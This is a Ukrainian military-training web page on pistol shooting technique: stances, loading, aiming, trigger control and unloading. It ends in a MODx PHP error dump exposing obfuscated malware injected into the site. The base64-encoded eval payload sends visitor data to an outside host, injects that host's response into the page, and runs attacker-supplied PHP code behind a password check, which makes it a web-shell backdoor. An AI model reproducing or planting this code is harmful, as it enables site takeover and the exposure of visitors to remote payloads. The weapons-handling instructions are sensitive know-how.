Прийоми та правила стрільби з пістолета

Український легіон » Дисципліни » ВОГНЕВА ПІДГОТОВКА » Прийоми та правила стрільби з пістолета

Прийоми та способи стрільби з пістолета

 

Способами стрільби є:

-          стрільба з положення стоячи;

-          стрільба з положення з коліна;

-          стрільба з положення лежачи;

-          стрільба з руки й з упору;

-          стрільба при русі на машині й т.п.

Всі прийоми стрільби стріляючий виконує швидко, не припиняючи спостереження за ціллю.

 

Стрільба з пістолета складається з виконання наступних прийомів:

-          приготування до стрільби (зарядження пістолета, прийняття положення для стрільби);

-          здійснення пострілу (прицілювання, спуск курка);

-          припинення стрільби (припинення натискання на хвіст спускового гачка, включення запобіжника, тобто переклад його в положення “запобігання”, розрядження пістолета).

В бою вогонь із пістолета ведеться самостійно.

З навчальною метою для стрільби з різних положень подається команда (приблизно) “По такій-то цілі (по мішені), стоячи (лежачи, з коліна) - вогонь”. Виконуючи цю команду необхідно прийняти зазначене положення, виключити запобіжник (опустити прапорець донизу) і, прицілюючись, зробити постріл самовзводом. Постріл при виконанні цієї команди може бути зроблений також з попереднім взведенням курка на бойовий взвод. У цьому випадку після встановлення курка на бойовий взвод необхідно прицілитися й нажати на хвіст спускового гачка.

Для виконання прийомів стрільби, що забезпечують найбільшу влучність і зручність дій стріляючого, він повинен залежно від своїх індивідуальних особистостей виробити найбільш зручне й стійке положення для стрільби, домагаючись при цьому одноманітного положення рукоятки в руці й найбільш зручного положення корпусу, рук і ніг.

 

Приготування до стрільби

 

При приготуванні до стрільби по команді “Заряджай” стріляючий повинен:

-          вийняти пістолет з кобури; витягти магазин з основи рукоятки; вкласти пістолет в кобуру;

-          спорядити магазин патронами;

-          вийняти пістолет з кобури й вставити магазин в основу рукоятки;

-          дослати патрон у патронник стволу, для чого зняти з запобіжника (опустити прапорець донизу), відвести лівою рукою затвор у крайнє заднє положення й відпустити його;

-          включити запобіжник (перевести прапорець запобіжника великим пальцем правої руки так, щоб він закрив червоний кружок) і вкласти пістолет у кобуру.

 

Для прийняття положення до стрільби стоячи необхідно:

-          повернутися впівоберта ліворуч й, не приставляючи правої ноги, виставити її вперед у напрямку до цілі на ширину плечей (як зручніше по росту), розподіливши вагу тіла рівномірно на обидві ноги;

-          відстібнути кришку й вийняти пістолет з кобури;

-          тримати пістолет прямовисно дуловою частиною догори проти правого ока, зберігаючи при цьому положення кисті руки на висоті підборіддя; ліва рука повинна бути вільно опущена уздовж тіла або закладена за спину;

-          утримуючи пістолет дуловою частиною догори, накласти великий палець правої руки на прапорець запобіжника й опустити його вниз (виключити запобіжник); вкласти вказівний палець у спускову скобу, не торкаючись спускового гачка.

При стрільбі з лівої руки положення корпусу зворотне; правою рукою вийняти пістолет з кобури й перекласти його в ліву руку.

 

Здійснення пострілу

 

Для здійснення пострілу з всіх положень для стрільби треба:

-          вибрати точку прицілювання;

-          не припиняючи спостереження за ціллю, витягнути праву руку з пістолетом наперед, утримуючи пістолет за рукоятку кистю правої руки;

-          накласти вказівний палець цієї руки першим суглобом на хвіст спускового гачка;

-          витягнути по лівій стороні рукоятки великий палець правої руки паралельно напрямку стволу;

-          витягнуту праву руку тримати вільно, без напруги, кисть цієї руки тримати в площині, яка проходить через вісь каналу стволу й ліктя руки;

-          рукоятку пістолета не стискати й тримати її по можливості однаково.

Для прицілювання треба затримати подих на природному видиху, прижмурити ліве око, а правим дивитись через проріз цілини на мушку так, щоб мушка знаходилась посередині прорізу, а вершина її – нарівні з верхніми краями цілини; у такому положенні підвести пістолет під точку прицілювання (не завалюючи його) і одночасно почати натискувати на хвіст спускового гачка.

Якщо стріляючому важко закрити окремо ліве око, дозволяється прицілюватися з відкритими обома очима.

Для спуску курка необхідно, затримавши подих, плавно натискати першим суглобом вказівного пальця на хвіст спускового гачка, поки курок непомітно для стріляючого, наче сам собою, не зірветься з бойового взводу, тобто не відбудеться постріл.

При зведеному попередньо курку варто мати на увазі, що спусковий гачок має деякий вільний хід, при цьому постріл не відбудеться.

При натисканні на хвіст спускового гачка натиск пальця робити прямо назад. Стріляючий повинен плавно збільшувати натиск на хвіст спускового гачка протягом того часу, коли вершина рівної мушки сполучається з точкою прицілювання. Коли ж мушка відхилиться від точки прицілювання, стріляючий повинен, не збільшуючи, але й не послабляючи натискання, виправити наведення й, як тільки рівна мушка знову поєднається із точкою прицілювання, знову плавно підсилити натискання на хвіст спускового гачка. При спуску курка не слід перейматися незначними коливаннями мушки в точках прицілювання; прагнення зробити спуск в момент найкращого співпадання мушки із точкою прицілювання може спричиняти смикання за спуск, а звідси неточний постріл.

Якщо стріляючий, натискаючи на хвіст спускового гачка, відчує, що не може більше не дихати, треба, не послаблюючи й не підсилюючи натискання пальця, перевести подих й, знову затримавши його, продовжити плавно дожимати хвіст спускового гачка.

 

Припинення стрільби

 

Припинення стрільби може бути тимчасове й повне.

Для тимчасового припинення стрільби подається команда “Стій”. По цій команді стріляючий повинен припинити натискання на спусковий гачок; утримуючи пістолет у правій руці, великим пальцем цієї руки підняти прапорець запобіжника догори так, щоб він закрив червоний кружечок (поставити на запобіжник), і, якщо потрібно перезарядити пістолет.

Для перезарядження пістолета треба:

-          витягти магазин з основи рукоятки пістолета;

-          вставити споряджений магазин в основу рукоятки;

-          якщо має бути стрільба, зняти з запобіжника (опустити прапорець донизу) і, якщо стрільба вестися з попереднім взведенням курка, поставити курок на бойовий взвод. (Якщо перед перезарядженням були витрачені всі патрони, необхідно відвести затвор назад і відпустити його).

Для повного припинення стрільби подається команда “Розряджай”.

По цій команді стріляючий повинен:

-          припинити натискання на спусковий гачок;

-          поставити на запобіжник;

-          розрядити пістолет.

Для розряджання пістолета треба:

-          витягти з основи рукоятки;

-          виключити запобіжник (опустити прапорець донизу);

-          витягти патрон з патронника, для чого, утримуючи пістолету правій руці за рукоятку, лівою рукою відвести затвор назад і відпустити його; підняти із землі (підлоги) патрон, викинутий затвором з патронника й обтерти його чистою ганчіркою;

-          включити запобіжник;

-          вкласти пістолет у кобуру;

-          вийняти патрони з магазина: взявши магазин у ліву руку, великим пальцем правої руки зрушити патрони один за одним по подавачу магазина й приймати їх долонею тієї ж руки;

-          вийняти пістолет з кобури; вставити магазин у основу рукоятки; знову вкласти пістолет у кобуру й застебнути кришку кобури.

По команді Зброя - до огляду стріляючий зобов’язаний:

-          лівою рукою вийняти магазин з основи рукоятки пістолета й вкласти його під великий палець правої руки попереду запобіжника так, щоб подавач магазина був на 2-3см вище замка;

-          після огляду зброї керівником стрільби взяти магазин у ліву руку;

-          великим пальцем правої руки нажати на кнопку замкової затримки й звільнити замок;

-          нажавши на спусковий гачок, зробити контрольний спуск курка;

-          поставити запобіжник у положення “запобігання”;

-          вставити магазин в основу рукоятки;

-          вкласти пістолет у кобуру й застебнути кришку кобури.

 

Правила стрільби з пістолета

Військовослужбовець, озброєний пістолетом, веде вогонь в бою самостійно, відповідно до обставин.

 

Вибір місця для стрільб

 

Стрільба з пістолета ведеться з будь-якого місця та будь-якого положення, що забезпечує ураження цілі у найкоротший час.

Під час бою місце для стрільби з пістолета обирається стріляючим самостійно. Під час вибору місця для стрільби необхідно врахувати обставини та характер місцевості.

Обране місце для стрільби повинно в найбільшій мірі забезпечувати зручність дій, найбільшу якість вогню та прикриття від вогню противника.

 

Вибір цілі

 

Цілями для стрільби з пістолета під час бою є поодинокі солдати та офіцери противника, які знаходяться відкрито, раптово з’являються або рухаються.

Під час вибору цілі необхідно керуватися вагомістю цілі, обираючи ту, яка найближча та найбільш вразлива.

 

Вибір точки прицілювання

 

Для більш надійного ураження цілі потрібно враховувати відстань до неї.

Під час стрільби по нерухомим цілям на відстані до 50м, точка прицілювання обирається кожного разу у відповідності до положення цілі та її висоти.

Стрільбу по цілям, які рухаються у площині стрільби, потрібно вести так само, як і по нерухомим цілям.

Для ураження цілі, яка рухається під кутом до площини стрільби, точку прицілювання потрібно виносити за напрямком руху цілі, враховуючи швидкість її руху.

Стрільбу по цілі, яка з’являється на короткий час або раптово, потрібно вести само взведенням та відкривати вогонь приблизно в момент найвигіднішого положення цілі.

Останні статті

Отримання дозволу на зброю
03.04.2015

Отримання дозволу на зброю

Перелік документів на придбання нарізної та гладкоствольної зброї
Детальніше
Гарнізонні заходи за участю військ.
28.05.2014

Гарнізонні заходи за участю військ.

Детальніше
MODx Content Manager »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert(): Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /sata2/home/users/ukrlegion/www/www.ukrlegion.com/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0,0103 s(22 Requests)
  PHP: 0,2402 s 
  Total: 0,2506 s